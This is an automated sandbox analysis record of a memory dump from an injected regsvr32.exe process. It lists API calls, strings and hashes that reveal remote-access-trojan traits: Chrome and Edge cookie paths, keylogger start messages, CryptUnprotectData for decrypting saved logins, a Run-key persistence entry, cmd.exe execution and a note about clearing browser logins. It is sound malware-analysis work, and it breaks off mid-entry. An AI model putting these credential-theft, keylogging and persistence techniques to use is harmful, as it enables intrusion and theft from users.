                                      • Instruction ID: 25698c5b5f3ed6646c3a9b58f19ae14f7714c9fcda3fbf858dd33b6138de3a84
                                      • Opcode Fuzzy Hash: 64ff003d21016030bf83ca0e7d33fc4afcfde995926193ff8372ee72b9cbc4b4
                                      • Instruction Fuzzy Hash: FC512E71940219AADB11EB95DDC5EEFB7BEFF14304F5004A6E50AE2190EF706A48CFA1
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104), ref: 02A43475
                                      • _free.LIBCMT ref: 02A43540
                                      • _free.LIBCMT ref: 02A4354A
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                      • API String ID: 2506810119-3922119987
                                      • Opcode ID: 4abc9ac6ce24c049d5f6665512be5c5b26184a7462b914e165d84e388958c680
                                      • Instruction ID: 25fed07448e0aa05849459d9d31a07bfe4b5c3aeade774ca91c3331170db5487
                                      • Opcode Fuzzy Hash: 4abc9ac6ce24c049d5f6665512be5c5b26184a7462b914e165d84e388958c680
                                      • Instruction Fuzzy Hash: 89318C71A40258EFDF22DF999980A9EBBBDEFC5315F2040A6E90497200DF70DA85CB91
                                      APIs
                                        • Part of subcall function 02A0C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02A0C559
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 02A0C6EC
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02A0C757
                                      Strings
                                      • User Data\Profile ?\Network\Cookies, xrefs: 02A0C704
                                      • User Data\Default\Network\Cookies, xrefs: 02A0C6D2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      • Opcode ID: 154403c7a189bb5d11b98951efd9252fe59e89b535855a7a25ae20b9b89414ee
                                      • Instruction ID: 8cda18a7c221d53241024ad0453cc9009248339d2ab8dcd5fe139d008816ac7a
                                      • Opcode Fuzzy Hash: 154403c7a189bb5d11b98951efd9252fe59e89b535855a7a25ae20b9b89414ee
                                      • Instruction Fuzzy Hash: 72211231D801199ACB05F7A1FDD5CEEBB7AEE50765B40051BE506930D0EF60AA4ACA90
                                      APIs
                                        • Part of subcall function 02A0C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02A0C4F6
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 02A0C61D
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02A0C688
                                      Strings
                                      • User Data\Profile ?\Network\Cookies, xrefs: 02A0C635
                                      • User Data\Default\Network\Cookies, xrefs: 02A0C603
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      • Opcode ID: 7b51e6cb1e973c1c334c82c14261e7fb8d8add47d53a6cc5932e9b789fae5322
                                      • Instruction ID: 853ef3f83877e511248d7ab0f86e1c4a3252fa8faf94c27fe2181b97e917f6cf
                                      • Opcode Fuzzy Hash: 7b51e6cb1e973c1c334c82c14261e7fb8d8add47d53a6cc5932e9b789fae5322
                                      • Instruction Fuzzy Hash: 2F211F31D801199ACB14FBA1FDD5CEEBB3AFE50765F40052BE506A30D0EF609A4ACA90
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A27D,02A750F0,00000000,00000000), ref: 02A0A1FE
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A267,02A750F0,00000000,00000000), ref: 02A0A20E
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A289,02A750F0,00000000,00000000), ref: 02A0A21A
                                        • Part of subcall function 02A0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,02A750F0), ref: 02A0B172
                                        • Part of subcall function 02A0B164: wsprintfW.USER32 ref: 02A0B1F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTimewsprintf
                                      • String ID: Offline Keylogger Started
                                      • API String ID: 465354869-4114347211
                                      • Opcode ID: 7cbb0a197d2892e4ecb9a7d0a8b8f5810bd9383aae508bf3a3f0d2d21cba559a
                                      • Instruction ID: cd95a42147c53053edc0a99ef102c9ee3370e582530677c96cdacddf7cf3aabf
                                      • Opcode Fuzzy Hash: 7cbb0a197d2892e4ecb9a7d0a8b8f5810bd9383aae508bf3a3f0d2d21cba559a
                                      • Instruction Fuzzy Hash: 3E11CAB12403087EA220BB35ADCACBF775EDE953A8B40096DF947021D5DE615D58CEF2
                                      APIs
                                        • Part of subcall function 02A0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,02A750F0), ref: 02A0B172
                                        • Part of subcall function 02A0B164: wsprintfW.USER32 ref: 02A0B1F3
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A267,?,00000000,00000000), ref: 02A0AF6E
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A289,?,00000000,00000000), ref: 02A0AF7A
                                      • CreateThread.KERNEL32(00000000,00000000,02A0A295,?,00000000,00000000), ref: 02A0AF86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTime$wsprintf
                                      • String ID: Online Keylogger Started
                                      • API String ID: 112202259-1258561607
                                      • Opcode ID: 9675ce4c1e2f618d76f5b52a5c30f9f2a4f3a6abc595cf674cbfca542b36bfe2
                                      • Instruction ID: 333a129356feae9cd5f6849044229274b0153b4e696bc5efc999efca8889b181
                                      • Opcode Fuzzy Hash: 9675ce4c1e2f618d76f5b52a5c30f9f2a4f3a6abc595cf674cbfca542b36bfe2
                                      • Instruction Fuzzy Hash: AD0126917803083EF62077356CCAD7F7F2ECA853A8F400469FA4612186DE561C098BF2
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 02A04F81
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A04FCD
                                      • CreateThread.KERNEL32(00000000,00000000,02A05150,?,00000000,00000000), ref: 02A04FE0
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 02A04F94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$EventLocalThreadTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 2532271599-1507639952
                                      • Opcode ID: 77987b474b36334bbaee438ea286c1c93668b6b58f11dcf0890e738ccb078239
                                      • Instruction ID: 536a7ba765904c77489e7c37f58067cb951a32e529b278c7221310160005489f
                                      • Opcode Fuzzy Hash: 77987b474b36334bbaee438ea286c1c93668b6b58f11dcf0890e738ccb078239
                                      • Instruction Fuzzy Hash: 7111E731C44384AAD720A776A88DEABBFBCABC6710F04040FE54146180CE749445CBB2
                                      APIs
                                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 02A06A82
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A06A89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: CryptUnprotectData$crypt32
                                      • API String ID: 2574300362-2380590389
                                      • Opcode ID: 6ff5ebb3ddf0764b1f8ea5dffed653960874f81d26051a8266ef97d32dbd9c71
                                      • Instruction ID: e1c2217ddd56e89b7d49660b55c829d654cb977a50f0ea710748b5ebf6f24a59
                                      • Opcode Fuzzy Hash: 6ff5ebb3ddf0764b1f8ea5dffed653960874f81d26051a8266ef97d32dbd9c71
                                      • Instruction Fuzzy Hash: E901F531A00216ABDB18DFAEA8849AFBBBCEB48704F04816DE915D3240DF70D951C7A0
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,02A05159), ref: 02A05173
                                      • CloseHandle.KERNEL32(?), ref: 02A051CA
                                      • SetEvent.KERNEL32(?), ref: 02A051D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandleObjectSingleWait
                                      • String ID: Connection Timeout
                                      • API String ID: 2055531096-499159329
                                      • Opcode ID: 41945c9003b5e9db44873d7af06dba0c3310c6a431a2b3f510afc926735244df
                                      • Instruction ID: 190c4971fb954cd820d7ba318f9a91ffbdf0066b270b6fe630041e4e16953c82
                                      • Opcode Fuzzy Hash: 41945c9003b5e9db44873d7af06dba0c3310c6a431a2b3f510afc926735244df
                                      • Instruction Fuzzy Hash: 01012430E80B00AFE3257F35A8D542BBBE5FF01301744092DD58386AA0DF209805CF51
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A0E833
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2005118841-1866435925
                                      • Opcode ID: f62972f35983b644f2466070a8536e15e03f8a154d8a414f562eda8cc239a2e9
                                      • Instruction ID: 8eeb5820da1a40b92477a9be432be3d922ef963b4994c581df3a0c90bb49adc4
                                      • Opcode Fuzzy Hash: f62972f35983b644f2466070a8536e15e03f8a154d8a414f562eda8cc239a2e9
                                      • Instruction Fuzzy Hash: 7701A2705D0308BBF718EB90EFC6FBE7769AB10705F044C49EA16550C0EF617615DA66
                                      Strings
                                      • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 02A076C4
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                      • API String ID: 0-3922119987
                                      • Opcode ID: 29274ba21d00856ed2c82f865a4589a9d1efae04021464d68e779c1ec412070a
                                      • Instruction ID: 410012b19fa770e43e6bb723961c05345a0c0059a8461ffbf0fb97e28754d5f1
                                      • Opcode Fuzzy Hash: 29274ba21d00856ed2c82f865a4589a9d1efae04021464d68e779c1ec412070a
                                      • Instruction Fuzzy Hash: BEF09070E90351DBCA1467A47E9877A7A5AA781742F800C66E907CA2C0EF749816CA58
                                      APIs
                                      • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 02A1381F
                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,02A752D8,6CEC7450,?), ref: 02A1384D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,02A752D8,6CEC7450,?,?,?,?,?,02A0CFAA,?,00000000), ref: 02A13858
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02A1381D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 1818849710-1051519024
                                      • Opcode ID: cba41a12e45afdde46c126a9ac872aba6bfe6b40e6c59236e41965a7ba76ee78
                                      • Instruction ID: abc5d3022719097c9fc61aa7df36e078476db09865aadfcd78dd8727a2fd1b3a
                                      • Opcode Fuzzy Hash: cba41a12e45afdde46c126a9ac872aba6bfe6b40e6c59236e41965a7ba76ee78
                                      • Instruction Fuzzy Hash: 37F04971980228FBDF109FA1ED85BEB376CEF04761F104956F9099A150EF329A14DA90
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02A0DFB1
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 02A0DFF0
                                        • Part of subcall function 02A35640: _Yarn.LIBCPMT ref: 02A3565F
                                        • Part of subcall function 02A35640: _Yarn.LIBCPMT ref: 02A35683
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A0E016
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                      • String ID: bad locale name
                                      • API String ID: 3628047217-1405518554
                                      • Opcode ID: 1d7dc909ef5f23ac6d6c2e5dec998fa23c8a931dbb7f40c8248c333741fed21d
                                      • Instruction ID: 92347ad238b0823f38f598cdc65d69e5f68da64d781a640cd4cacd0c0563a59e
                                      • Opcode Fuzzy Hash: 1d7dc909ef5f23ac6d6c2e5dec998fa23c8a931dbb7f40c8248c333741fed21d
                                      • Instruction Fuzzy Hash: 03F0A9318806049EC734FB64FE95F9AB7699F11710F504A59AA06624D0DF64B618CE44
                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,02A6611C), ref: 02A1377E
                                      • RegSetValueExA.ADVAPI32(02A6611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,02A1CAB1,WallpaperStyle,02A6611C,00000001,02A74EE0,00000000), ref: 02A137A6
                                      • RegCloseKey.ADVAPI32(02A6611C,?,?,02A1CAB1,WallpaperStyle,02A6611C,00000001,02A74EE0,00000000,?,02A0875D,00000001), ref: 02A137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: Control Panel\Desktop
                                      • API String ID: 1818849710-27424756
                                      • Opcode ID: 527050aa64e5fe5b248f4c1f9813903226ae521415fe1a530d18350dc762058c
                                      • Instruction ID: 114e5503f0a28dcce12461a73728adc79cd3aca8e9df28210cbbf5d19057357f
                                      • Opcode Fuzzy Hash: 527050aa64e5fe5b248f4c1f9813903226ae521415fe1a530d18350dc762058c
                                      • Instruction Fuzzy Hash: B3F0F972980218FBDF00AFA0ED85EEB7B6DEF04750B104956FD09AA150EF329E14DA90
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 02A16130
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell
                                      • String ID: /C $cmd.exe$open
                                      • API String ID: 587946157-3896048727
                                      • Opcode ID: e89e5fdb0a45c40b5133ec85490bb418df91afe1a25cc3ff0d6706ea107702a1
                                      • Instruction ID: 8f0909ef16c6a0909e7de62b39273eaa35a02d290c75bef7fff93cbbcd3f50c4
                                      • Opcode Fuzzy Hash: e89e5fdb0a45c40b5133ec85490bb418df91afe1a25cc3ff0d6706ea107702a1
                                      • Instruction Fuzzy Hash: F5E0C070688344AAD605E664E9D8CBF73AEBA54754B40081EB147920D0EF649D09CE51
                                      APIs
                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 02A014B9
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A014C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetLastInputInfo$User32.dll
                                      • API String ID: 2574300362-1519888992
                                      • Opcode ID: c3b9580e49b4f0c04cdc2c8a45f74f76b1d10e2b0c39aa284b451c18302042d5
                                      • Instruction ID: 48b0a3b94562cf83abeda35b4d5136331999fa973ea86372d9d753a1f6a8efdd
                                      • Opcode Fuzzy Hash: c3b9580e49b4f0c04cdc2c8a45f74f76b1d10e2b0c39aa284b451c18302042d5
                                      • Instruction Fuzzy Hash: 47B092B1DC1311FBEB105FB4A80EA2FBBAAB614712B00880BB842D5101CFB080229F96
                                      APIs
                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 02A01414
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A0141B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetCursorInfo$User32.dll
                                      • API String ID: 1646373207-2714051624
                                      • Opcode ID: 2870f1eca8d5107408f166ddad11655c1d347b8f977fd7d015bf166ccbf71763
                                      • Instruction ID: 95fb7c19f66186e21de557402e720d92b9b186ad20c5d8acac6372bbd413e2d2
                                      • Opcode Fuzzy Hash: 2870f1eca8d5107408f166ddad11655c1d347b8f977fd7d015bf166ccbf71763
                                      • Instruction Fuzzy Hash: 8FB09BB0DC1351EBFB105BF4580F81F7756B5147127004C16B44795100CF708016C655
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                      • Instruction ID: dad1353546a90712ecfd4d4888650379a3cf3792588ae052cef0c0fa8ce679e2
                                      • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                      • Instruction Fuzzy Hash: 71A17872A803869FD721CF58C8A0BAEFBE5EF95304F24416DD9859B292DF39C941CB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: f802fb61b7caf1c359d39ef9158ed3196f56a442e576797c277dbf5b51257c2b
                                      • Instruction ID: a0f0e320892be89739f6442ba44ce7f3048d834f2908a924456817bc49000a5a
                                      • Opcode Fuzzy Hash: f802fb61b7caf1c359d39ef9158ed3196f56a442e576797c277dbf5b51257c2b
                                      • Instruction Fuzzy Hash: 73414F32A40624ABDF246BB98D84B7F3BBEDF45B30F944615FD28D6190DF74C4405A62
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a48a5988053c405985a8fa2cdb4b04c229f327dba2cf51ec9c8b27d2fc67c575
                                      • Instruction ID: bf441550ed05be3d724fa5b0dfe09daf17f4db55ea04497558c1ed73902a6977
                                      • Opcode Fuzzy Hash: a48a5988053c405985a8fa2cdb4b04c229f327dba2cf51ec9c8b27d2fc67c575
                                      • Instruction Fuzzy Hash: 9D41D771A40314AFD7249F78CD40B5EBBEAEBC8710F10856AF915DB690DF71D9418B90
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,02A74F50), ref: 02A04DB3
                                      • CreateThread.KERNEL32(00000000,00000000,?,02A74EF8,00000000,00000000), ref: 02A04DC7
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 02A04DD2
                                      • CloseHandle.KERNEL32(?,?,00000000), ref: 02A04DDB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 3360349984-0
                                      • Opcode ID: cbba40bca2c73c7581d65bc9a830191f578bfbe4b06c91763f6a2ca651e1533d
                                      • Instruction ID: 979e96ddf8341bfc3478d7428baeeda7da06ddfb29e9384c8f68ae19db446f42
                                      • Opcode Fuzzy Hash: cbba40bca2c73c7581d65bc9a830191f578bfbe4b06c91763f6a2ca651e1533d
                                      • Instruction Fuzzy Hash: C3418371588301AFC714EB61EED4EBFB7EEAF84350F40091EF996921D0DF249919CA62
                                      APIs
                                      Strings
                                      • [Cleared browsers logins and cookies.], xrefs: 02A0C0E4
                                      • Cleared browsers logins and cookies., xrefs: 02A0C0F5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                      • API String ID: 3472027048-1236744412
                                      • Opcode ID: 6d90015d52386fc58e1bdb1c74d8c2d152b0892293eea41f2fb1241984de9077
                                      • Instruction ID: 6d1098ff96e44b746006e252fe160d2bf181b0269ac4abead89411e1eabce276
                                      • Opcode Fuzzy Hash: 6d90015d52386fc58e1bdb1c74d8c2d152b0892293eea41f2fb1241984de9077
                                      • Instruction Fuzzy Hash: 4031C8046C83C06EEA116FB475D5BAB7F834E93768F484A5EADC50B2C2CF524409CB63
                                      APIs
                                      • _free.LIBCMT ref: 02A493BD
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • GetTimeZoneInformation.KERNEL32 ref: 02A493CF
                                      • WideCharToMultiByte.KERNEL32(00000000,?,02A72764,000000FF,?,0000003F,?,?), ref: 02A49447
                                      • WideCharToMultiByte.KERNEL32(00000000,?,02A727B8,000000FF,?,0000003F,?,?,?,02A72764,000000FF,?,0000003F,?,?), ref: 02A49474
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                      • String ID:
                                      • API String ID: 806657224-0
                                      • Opcode ID: 857bd42f98e8b09ae3213ad9d76c64b33232dc323df6aaaf7e7a3ce47fb2a132
                                      • Instruction ID: e39e29e4b648967b29232b598d99c972fa7b233206bbeab333f809aa2f6ed78b
                                      • Opcode Fuzzy Hash: 857bd42f98e8b09ae3213ad9d76c64b33232dc323df6aaaf7e7a3ce47fb2a132
                                      • Instruction Fuzzy Hash: 2531A470D44216DFCB11DF69DD8096BBBB8FF8576075446AAE4609B290DF30C925CB50
                                      APIs
                                        • Part of subcall function 02A1C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A1C561
                                        • Part of subcall function 02A1C551: GetWindowTextLengthW.USER32(00000000), ref: 02A1C56A
                                        • Part of subcall function 02A1C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 02A1C594
                                      • Sleep.KERNEL32(000001F4), ref: 02A0A573
                                      • Sleep.KERNEL32(00000064), ref: 02A0A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$ForegroundLength
                                      • String ID: [ $ ]
                                      • API String ID: 3309952895-93608704
                                      • Opcode ID: e07feaeaf3f6ca88d561a2936b2e8eb270ea64372474cf5e9c8ef3f8aa38831f
                                      • Instruction ID: 44f2f428164117f6ff91953a4053d47ea7c9500e2bfa913b99d11c22afd5a8ec
                                      • Opcode Fuzzy Hash: e07feaeaf3f6ca88d561a2936b2e8eb270ea64372474cf5e9c8ef3f8aa38831f
                                      • Instruction Fuzzy Hash: 99119F315843005BC618BB64EED19AFB7BABF50710F40051EE656564E2FF61AE18CED2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 270860a5f63311d4955aaccad06ff3d292f68178642bca00367de82a70de573b
                                      • Instruction ID: 2c27b7d56553800ce7e6e20c84b47792c0c4a7528422be3601827ba0f13f2fb0
                                      • Opcode Fuzzy Hash: 270860a5f63311d4955aaccad06ff3d292f68178642bca00367de82a70de573b
                                      • Instruction Fuzzy Hash: 5D018FB3A89316BEFA202A786CC0F67261DDBC17B9B380776B531611D0DFA1CC5149A0
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1827881455c00197c5bcb875a79a66c0dde9f4aa45af04208978ae4deff5d3e4
                                      • Instruction ID: b61e6541268b8c347f3e07f0f8ecd2f220abb07faf29be26732e1ab5d5cd2d04
